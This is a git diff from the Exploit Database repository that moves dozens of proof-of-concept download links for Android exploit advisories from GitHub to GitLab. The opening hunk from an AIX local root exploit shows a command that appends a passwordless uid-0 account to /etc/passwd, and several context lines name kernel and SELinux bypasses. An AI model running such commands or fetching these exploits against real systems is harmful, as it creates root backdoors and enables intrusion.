diff --git a/exploits/aix/local/45938.pl b/exploits/aix/local/45938.pl index 90a14b11f..a5ad603ad 100755 --- a/exploits/aix/local/45938.pl +++ b/exploits/aix/local/45938.pl @@ -138,5 +138,4 @@ print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n"; $result = `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`; print "[-] Done \n"; -print "[+] 'su wow' for root shell \n"; - +print "[+] 'su wow' for root shell \n"; \ No newline at end of file diff --git a/exploits/android/dos/38555.txt b/exploits/android/dos/38555.txt index cf53f2ba7..16adb75be 100644 --- a/exploits/android/dos/38555.txt +++ b/exploits/android/dos/38555.txt @@ -35,4 +35,4 @@ In this code snippet, the data.buf_out.num_planes value is attacker-controlled " Proof-of-concept code to trigger this issue (from a privileged shell) is attached (m2m1shot_compat.c). Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38555.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38555.zip \ No newline at end of file diff --git a/exploits/android/dos/38557.txt b/exploits/android/dos/38557.txt index 8097ae951..f41ee552c 100644 --- a/exploits/android/dos/38557.txt +++ b/exploits/android/dos/38557.txt @@ -56,4 +56,4 @@ One ioctl should have valid data, the other should fail At this point ctx->mm will now have invalid or free data (free if the forked process dies). Proof-of-concept code to trigger this condition is attached (fimg2d-lock.c) Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38557.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38557.zip \ No newline at end of file diff --git a/exploits/android/dos/38610.txt b/exploits/android/dos/38610.txt index 822e9e8e6..0e41d5426 100644 --- a/exploits/android/dos/38610.txt +++ b/exploits/android/dos/38610.txt @@ -26,4 +26,4 @@ I/DEBUG ( 2958): #03 pc 000000000042ec00 /system/priv-app/SecGallery2015/ To reproduce, download the file and open it in Gallery Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38610.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38610.zip \ No newline at end of file diff --git a/exploits/android/dos/38611.txt b/exploits/android/dos/38611.txt index 869ff4538..7a0c63f44 100644 --- a/exploits/android/dos/38611.txt +++ b/exploits/android/dos/38611.txt @@ -31,4 +31,4 @@ To reproduce, download the attached file and wait, or trigger media scanning by adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38611.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38611.zip \ No newline at end of file diff --git a/exploits/android/dos/38612.txt b/exploits/android/dos/38612.txt index abf3ada95..181f047a3 100644 --- a/exploits/android/dos/38612.txt +++ b/exploits/android/dos/38612.txt @@ -37,4 +37,4 @@ To reproduce, download the image file and wait, or trigger media scanning by cal adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38612.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38612.zip \ No newline at end of file diff --git a/exploits/android/dos/38613.txt b/exploits/android/dos/38613.txt index 9aa6feab6..2b3e6b87a 100644 --- a/exploits/android/dos/38613.txt +++ b/exploits/android/dos/38613.txt @@ -28,4 +28,4 @@ To reproduce, download the file and open it in Gallery. This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38613.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38613.zip \ No newline at end of file diff --git a/exploits/android/dos/38614.txt b/exploits/android/dos/38614.txt index 259426faa..5c1f2dea2 100644 --- a/exploits/android/dos/38614.txt +++ b/exploits/android/dos/38614.txt @@ -55,4 +55,4 @@ adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/she This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38614.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38614.zip \ No newline at end of file diff --git a/exploits/android/dos/39424.txt b/exploits/android/dos/39424.txt index e5b679bb9..b3c67e27b 100644 --- a/exploits/android/dos/39424.txt +++ b/exploits/android/dos/39424.txt @@ -37,4 +37,4 @@ adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/she Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39424.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39424.zip \ No newline at end of file diff --git a/exploits/android/dos/39425.txt b/exploits/android/dos/39425.txt index 1d92bc419..6e99eb525 100644 --- a/exploits/android/dos/39425.txt +++ b/exploits/android/dos/39425.txt @@ -29,4 +29,4 @@ adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/she Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39425.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39425.zip \ No newline at end of file diff --git a/exploits/android/dos/39629.txt b/exploits/android/dos/39629.txt index 3e7bec8a0..cfe680139 100644 --- a/exploits/android/dos/39629.txt +++ b/exploits/android/dos/39629.txt @@ -159,4 +159,4 @@ prNdisReq->ndisOidContent is in a static allocation of size 0x1000, and prIwReqD Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39629.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39629.zip \ No newline at end of file diff --git a/exploits/android/dos/39651.txt b/exploits/android/dos/39651.txt index 8539296a0..b04d9c5f3 100644 --- a/exploits/android/dos/39651.txt +++ b/exploits/android/dos/39651.txt @@ -55,4 +55,4 @@ Reported to Android here: https://code.google.com/p/android/issues/detail?id=185 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39651.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39651.zip \ No newline at end of file diff --git a/exploits/android/dos/39685.txt b/exploits/android/dos/39685.txt index b12b2373c..3e29f2e2e 100644 --- a/exploits/android/dos/39685.txt +++ b/exploits/android/dos/39685.txt @@ -42,4 +42,4 @@ Where XXXXXX should be uninitialized memory from the heap. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39685.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39685.zip \ No newline at end of file diff --git a/exploits/android/dos/39686.txt b/exploits/android/dos/39686.txt index 40da3a339..769df7068 100644 --- a/exploits/android/dos/39686.txt +++ b/exploits/android/dos/39686.txt @@ -86,4 +86,4 @@ I’ve provided a PoC which exploits the issue in ICrypto::decrypt. I will just Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39686.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39686.zip \ No newline at end of file diff --git a/exploits/android/dos/39921.txt b/exploits/android/dos/39921.txt index 20acdc312..5b497eaf4 100644 --- a/exploits/android/dos/39921.txt +++ b/exploits/android/dos/39921.txt @@ -92,4 +92,4 @@ cpsr 0x80070030 -2147024848 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39921.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39921.zip \ No newline at end of file diff --git a/exploits/android/dos/40381.txt b/exploits/android/dos/40381.txt index 3c5b97c37..8b9c00027 100644 --- a/exploits/android/dos/40381.txt +++ b/exploits/android/dos/40381.txt @@ -140,4 +140,4 @@ If there is e.g. some system_app that performs permissions checks (which use the Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40381.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40381.zip \ No newline at end of file diff --git a/exploits/android/dos/40449.txt b/exploits/android/dos/40449.txt index c023686b9..b8074683e 100644 --- a/exploits/android/dos/40449.txt +++ b/exploits/android/dos/40449.txt @@ -36,4 +36,4 @@ Its logcat output looks like this: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40449.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40449.zip \ No newline at end of file diff --git a/exploits/android/dos/40515.txt b/exploits/android/dos/40515.txt index 309df974c..2c7a907e3 100644 --- a/exploits/android/dos/40515.txt +++ b/exploits/android/dos/40515.txt @@ -142,4 +142,4 @@ a uint32_t is smaller than a binder_uintptr_t. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40515.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40515.zip \ No newline at end of file diff --git a/exploits/android/dos/40876.txt b/exploits/android/dos/40876.txt index b286d3f2b..f8190bc13 100644 --- a/exploits/android/dos/40876.txt +++ b/exploits/android/dos/40876.txt @@ -165,4 +165,4 @@ Fixed in the November security bulletin at https://source.android.com/security/b Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40876.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40876.zip \ No newline at end of file diff --git a/exploits/android/dos/40945.txt b/exploits/android/dos/40945.txt index 7e7912577..a9ec1345d 100644 --- a/exploits/android/dos/40945.txt +++ b/exploits/android/dos/40945.txt @@ -135,4 +135,4 @@ Fixed in https://source.android.com/security/bulletin/2016-12-01.html Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40945.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40945.zip \ No newline at end of file diff --git a/exploits/android/dos/40993.txt b/exploits/android/dos/40993.txt index 4f32028b2..f2a300580 100644 --- a/exploits/android/dos/40993.txt +++ b/exploits/android/dos/40993.txt @@ -58,4 +58,4 @@ According to the default SELinux rules as present on the SM-G935F (version XXS1A Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40993.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40993.zip \ No newline at end of file diff --git a/exploits/android/dos/41161.txt b/exploits/android/dos/41161.txt index 7b545dcb3..2101b3b3e 100644 --- a/exploits/android/dos/41161.txt +++ b/exploits/android/dos/41161.txt @@ -67,4 +67,4 @@ The sysfs entries mentioned above are world-readable and have an SELinux context Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41161.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41161.zip \ No newline at end of file diff --git a/exploits/android/dos/41211.txt b/exploits/android/dos/41211.txt index ee09cef9e..9c2fe9a8f 100644 --- a/exploits/android/dos/41211.txt +++ b/exploits/android/dos/41211.txt @@ -30,4 +30,4 @@ This PoC uses the CFP_ROPP_* commands to modify a kernel address in the kernel V Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41211.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41211.zip \ No newline at end of file diff --git a/exploits/android/dos/41212.txt b/exploits/android/dos/41212.txt index 7c4a241bb..66e38351f 100644 --- a/exploits/android/dos/41212.txt +++ b/exploits/android/dos/41212.txt @@ -38,4 +38,4 @@ This PoC disables the M bit in SCTLR_EL1. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41212.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41212.zip \ No newline at end of file diff --git a/exploits/android/dos/41218.txt b/exploits/android/dos/41218.txt index c48892d64..0812ea23e 100644 --- a/exploits/android/dos/41218.txt +++ b/exploits/android/dos/41218.txt @@ -44,4 +44,4 @@ This PoC s2-remaps RKP's physical address range and reads from it in EL1. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41218.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41218.zip \ No newline at end of file diff --git a/exploits/android/dos/41232.txt b/exploits/android/dos/41232.txt index 217ec5db0..9c46d90e0 100644 --- a/exploits/android/dos/41232.txt +++ b/exploits/android/dos/41232.txt @@ -64,4 +64,4 @@ This PoC modifies an instruction within RKP's address space by repeatedly callin Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41232.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41232.zip \ No newline at end of file diff --git a/exploits/android/dos/41351.txt b/exploits/android/dos/41351.txt index e7cc0557a..d0685e6a6 100644 --- a/exploits/android/dos/41351.txt +++ b/exploits/android/dos/41351.txt @@ -63,4 +63,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41351.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41351.zip \ No newline at end of file diff --git a/exploits/android/dos/41352.txt b/exploits/android/dos/41352.txt index 074cf1871..3f0890086 100644 --- a/exploits/android/dos/41352.txt +++ b/exploits/android/dos/41352.txt @@ -47,4 +47,4 @@ u:r:lghashstorageserver:s0 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41352.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41352.zip \ No newline at end of file diff --git a/exploits/android/dos/41353.txt b/exploits/android/dos/41353.txt index 00ee84552..f33d5361c 100644 --- a/exploits/android/dos/41353.txt +++ b/exploits/android/dos/41353.txt @@ -92,4 +92,4 @@ disable selinux enforcement. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41353.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41353.zip \ No newline at end of file diff --git a/exploits/android/dos/41354.txt b/exploits/android/dos/41354.txt index 122493df9..34d2b5a9e 100644 --- a/exploits/android/dos/41354.txt +++ b/exploits/android/dos/41354.txt @@ -80,4 +80,4 @@ Here is a sample crash from a successful execution of the PoC: Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41354.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41354.zip \ No newline at end of file diff --git a/exploits/android/dos/41355.txt b/exploits/android/dos/41355.txt index faf3b7941..58e054cdb 100644 --- a/exploits/android/dos/41355.txt +++ b/exploits/android/dos/41355.txt @@ -97,4 +97,4 @@ Here is a sample crash from a successful execution of the PoC: Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41355.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41355.zip \ No newline at end of file diff --git a/exploits/android/dos/41981.txt b/exploits/android/dos/41981.txt index 653c36509..2e76de7cc 100644 --- a/exploits/android/dos/41981.txt +++ b/exploits/android/dos/41981.txt @@ -79,4 +79,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41981.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41981.zip \ No newline at end of file diff --git a/exploits/android/dos/41982.txt b/exploits/android/dos/41982.txt index 05c54bcb5..cd78faddc 100644 --- a/exploits/android/dos/41982.txt +++ b/exploits/android/dos/41982.txt @@ -53,4 +53,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41982.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41982.zip \ No newline at end of file diff --git a/exploits/android/dos/41983.txt b/exploits/android/dos/41983.txt index c36840d8c..6403cd608 100644 --- a/exploits/android/dos/41983.txt +++ b/exploits/android/dos/41983.txt @@ -130,4 +130,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41983.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41983.zip \ No newline at end of file diff --git a/exploits/android/dos/42169.txt b/exploits/android/dos/42169.txt index 69784e3df..9e305551d 100644 --- a/exploits/android/dos/42169.txt +++ b/exploits/android/dos/42169.txt @@ -61,4 +61,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42169.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42169.zip \ No newline at end of file diff --git a/exploits/android/dos/42170.txt b/exploits/android/dos/42170.txt index f24482917..413cf1457 100644 --- a/exploits/android/dos/42170.txt +++ b/exploits/android/dos/42170.txt @@ -77,4 +77,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42170.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42170.zip \ No newline at end of file diff --git a/exploits/android/dos/42171.txt b/exploits/android/dos/42171.txt index d085e383f..0d3839eab 100644 --- a/exploits/android/dos/42171.txt +++ b/exploits/android/dos/42171.txt @@ -41,4 +41,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42171.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42171.zip \ No newline at end of file diff --git a/exploits/android/dos/42285.txt b/exploits/android/dos/42285.txt index 23d7efba7..6b7f6ea7b 100644 --- a/exploits/android/dos/42285.txt +++ b/exploits/android/dos/42285.txt @@ -23,4 +23,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42285.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42285.zip \ No newline at end of file diff --git a/exploits/android/dos/43464.txt b/exploits/android/dos/43464.txt index 3c20db813..4bf85ca7a 100644 --- a/exploits/android/dos/43464.txt +++ b/exploits/android/dos/43464.txt @@ -83,4 +83,4 @@ The issue can also be exploited from the "isolated_app" SELinux context (and per Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43464.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43464.zip \ No newline at end of file diff --git a/exploits/android/dos/43513.txt b/exploits/android/dos/43513.txt index be74aab5a..a8303f03d 100644 --- a/exploits/android/dos/43513.txt +++ b/exploits/android/dos/43513.txt @@ -92,4 +92,4 @@ These commands are all similarly racy (due to the getpidcon(...) usage), but are Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43513.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43513.zip \ No newline at end of file diff --git a/exploits/android/dos/43996.txt b/exploits/android/dos/43996.txt index f1c24e940..ae72131d3 100644 --- a/exploits/android/dos/43996.txt +++ b/exploits/android/dos/43996.txt @@ -60,4 +60,4 @@ After applying the patch, the attached PoC should be built as part of the Androi Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43996.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43996.zip \ No newline at end of file diff --git a/exploits/android/dos/44268.txt b/exploits/android/dos/44268.txt index a1d732a1c..b7924f5be 100644 --- a/exploits/android/dos/44268.txt +++ b/exploits/android/dos/44268.txt @@ -1,3 +1,3 @@ This Exploit allows arbitrary memory writes and reads. Running the specified payload within this package will write to the device's main CPU kernel, causing it to crash. More information about its origins here: http://boosterok.com/blog/broadpwn2/ -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44268.zip +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44268.zip \ No newline at end of file diff --git a/exploits/android/dos/44724.txt b/exploits/android/dos/44724.txt index 0ccc2aeeb..f5bb570f3 100644 --- a/exploits/android/dos/44724.txt +++ b/exploits/android/dos/44724.txt @@ -26,4 +26,4 @@ This was tested on Samsung build number NRD90M.G93FXXU1DQJ8, which is the most r Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44724.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44724.zip \ No newline at end of file diff --git a/exploits/android/dos/45558.txt b/exploits/android/dos/45558.txt index 638b025cd..c8daff3e3 100644 --- a/exploits/android/dos/45558.txt +++ b/exploits/android/dos/45558.txt @@ -200,4 +200,4 @@ To reproduce that, follow these steps: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45558.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45558.zip \ No newline at end of file diff --git a/exploits/android/dos/45579.txt b/exploits/android/dos/45579.txt index 6edcbeb53..d7102a8c8 100644 --- a/exploits/android/dos/45579.txt +++ b/exploits/android/dos/45579.txt @@ -48,4 +48,4 @@ Logs from the crashes on Android and iPhone are attached. Note that I modified t Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45579.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45579.zip \ No newline at end of file diff --git a/exploits/android/dos/46356.txt b/exploits/android/dos/46356.txt index caf052a24..6d42451da 100644 --- a/exploits/android/dos/46356.txt +++ b/exploits/android/dos/46356.txt @@ -267,4 +267,4 @@ the upstream kernel, too. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46356.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46356.zip \ No newline at end of file diff --git a/exploits/android/dos/46357.txt b/exploits/android/dos/46357.txt index afe2132cc..df4bce306 100644 --- a/exploits/android/dos/46357.txt +++ b/exploits/android/dos/46357.txt @@ -223,4 +223,4 @@ The dmesg splat should look like this: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46357.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46357.zip \ No newline at end of file diff --git a/exploits/android/dos/46503.txt b/exploits/android/dos/46503.txt index 4d35fb88f..3340b4e07 100644 --- a/exploits/android/dos/46503.txt +++ b/exploits/android/dos/46503.txt @@ -161,4 +161,4 @@ You should see something like this in dmesg (if you have Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46503.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46503.zip \ No newline at end of file diff --git a/exploits/android/dos/46504.txt b/exploits/android/dos/46504.txt index 58d000713..f757716ec 100644 --- a/exploits/android/dos/46504.txt +++ b/exploits/android/dos/46504.txt @@ -222,4 +222,4 @@ set VM_IO, it is possible to use madvise(..., MADV_DOFORK) to clear that flag: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46504.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46504.zip \ No newline at end of file diff --git a/exploits/android/dos/46853.txt b/exploits/android/dos/46853.txt index 51975d7b5..e73c0eaf6 100644 --- a/exploits/android/dos/46853.txt +++ b/exploits/android/dos/46853.txt @@ -52,4 +52,4 @@ WeChat will crash now if a message that contains the overwritten emoji file Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46853.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46853.zip \ No newline at end of file diff --git a/exploits/android/dos/46941.txt b/exploits/android/dos/46941.txt index eaa9dc13d..10151d750 100644 --- a/exploits/android/dos/46941.txt +++ b/exploits/android/dos/46941.txt @@ -292,4 +292,4 @@ The KASAN report points to instruction 267c in the following assembly: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46941.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46941.zip \ No newline at end of file diff --git a/exploits/android/dos/47119.txt b/exploits/android/dos/47119.txt index 50bf9f235..327eda343 100644 --- a/exploits/android/dos/47119.txt +++ b/exploits/android/dos/47119.txt @@ -76,4 +76,4 @@ Hvec-"fright" is possible. You can own the mobile by viewing a video with payloa Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47119.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47119.zip \ No newline at end of file diff --git a/exploits/android/dos/47920.txt b/exploits/android/dos/47920.txt index 842da756d..57832d8c2 100644 --- a/exploits/android/dos/47920.txt +++ b/exploits/android/dos/47920.txt @@ -21,4 +21,4 @@ A crash log is attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47920.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47920.zip \ No newline at end of file diff --git a/exploits/android/local/39757.txt b/exploits/android/local/39757.txt index aa5673a47..369018b7a 100644 --- a/exploits/android/local/39757.txt +++ b/exploits/android/local/39757.txt @@ -6,4 +6,4 @@ Qualcomm's Secure Execution Environment (QSEE) Privilege Escalation Exploit usi Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39757.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39757.zip \ No newline at end of file diff --git a/exploits/android/local/40066.txt b/exploits/android/local/40066.txt index 776887e22..efaee6fa0 100644 --- a/exploits/android/local/40066.txt +++ b/exploits/android/local/40066.txt @@ -227,4 +227,4 @@ the JACK server process. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40066.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40066.zip \ No newline at end of file diff --git a/exploits/android/local/41130.txt b/exploits/android/local/41130.txt index 584e7084a..8b871d2cc 100644 --- a/exploits/android/local/41130.txt +++ b/exploits/android/local/41130.txt @@ -70,4 +70,4 @@ The high-level flow for executing a function in the kernel is the following: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41130.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41130.zip \ No newline at end of file diff --git a/exploits/android/local/41217.txt b/exploits/android/local/41217.txt index 0bdac3ca9..f41768d53 100644 --- a/exploits/android/local/41217.txt +++ b/exploits/android/local/41217.txt @@ -92,4 +92,4 @@ This issue can be reproduced by simply writing code to any of these memory regio Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41217.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41217.zip \ No newline at end of file diff --git a/exploits/android/local/42601.txt b/exploits/android/local/42601.txt index 8db6c183d..f14bc99e2 100644 --- a/exploits/android/local/42601.txt +++ b/exploits/android/local/42601.txt @@ -28,4 +28,4 @@ cedric:/ # Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42601.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42601.zip \ No newline at end of file diff --git a/exploits/android/local/45192.txt b/exploits/android/local/45192.txt index 056f67e0a..0b3cbfe87 100644 --- a/exploits/android/local/45192.txt +++ b/exploits/android/local/45192.txt @@ -344,4 +344,4 @@ and then interpreted, allowing the attacker to steal photos from the device Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45192.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45192.zip \ No newline at end of file diff --git a/exploits/android/local/45379.txt b/exploits/android/local/45379.txt index 2665091a6..84b34d77b 100644 --- a/exploits/android/local/45379.txt +++ b/exploits/android/local/45379.txt @@ -95,4 +95,4 @@ I have attached an exploit for the full chain, with usage instructions in USAGE. WARNING: As always, this exploit is 